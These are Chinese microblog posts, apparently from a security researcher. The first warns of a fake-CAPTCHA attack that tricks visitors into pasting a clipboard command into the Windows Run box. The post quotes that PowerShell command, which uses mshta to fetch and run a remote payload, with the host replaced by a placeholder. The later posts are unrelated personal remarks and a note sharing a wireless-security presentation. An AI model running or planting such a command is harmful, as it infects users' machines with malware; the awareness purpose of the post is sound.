2025-02-13 16:52
现在黑产有一种新的社交工程学挂马方案。
你访问一些网站的时候,网页忽然弹出提示,让你证明自己是真人。这倒也很常见,于是你点了一下那个验证窗口,又弹出提示,让你按 Win+R,然后 Ctrl+V,再回车(图一)。
你按下 Win+R,发现弹出一个窗口。再按 Ctrl+V,窗口里出现了:✅ 'I am not a robot: CAPTCHA Verification UID: 7811'(图二)。这好像真的是在做验证。但这时只要你再按一下回车,你的电脑就会下载并执行攻击者的木马。
因为在你最开始点击那个验证窗口的时候,网站向你的剪贴板中写入的内容实际是:
powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'
这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限,对过长的输入行只显示末尾部分。攻击者精确地控制内容长度,巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候,已经晚了。
图三显然是一个受害者。
2020-04-11 11:39
我小时候也有写东西把自己给写感动了的时候。后来发现自己感动自己实在是要不得,还是得讲逻辑,讲证据。人一感动,就别指望讲道理了。自己感动自己,就自我赋予了先验的正义性。然后就不能碰了,一碰就炸。这个有的叫认知失调,有的叫 PTSD。
2011-09-07 21:58
看了@沈沉舟 同志关于交流分享的那条微博(🔗网页链接)后,我也打算以后多交流一些。
2011-09-07 21:52
分享PPT:🔗网页链接。这是5年前为CNCERT/CC应急响应年会准备的。内容涉及Wi-Fi、BlueTooth、手机、RFID、红外、电磁泄漏等等。考虑到会议受众,内容设计以科普为目标,突出全面性,同时在几个点上稍微深入了一下。如果你想对无线方面有个概览性的了解,浏览一下这个PPT是比较省事的办法。
2020-07-01 19:19
凡有所相,皆是虚妄。原装不原装都是红粉骷髅,韩式半永久还瞧不起全套眼综合了?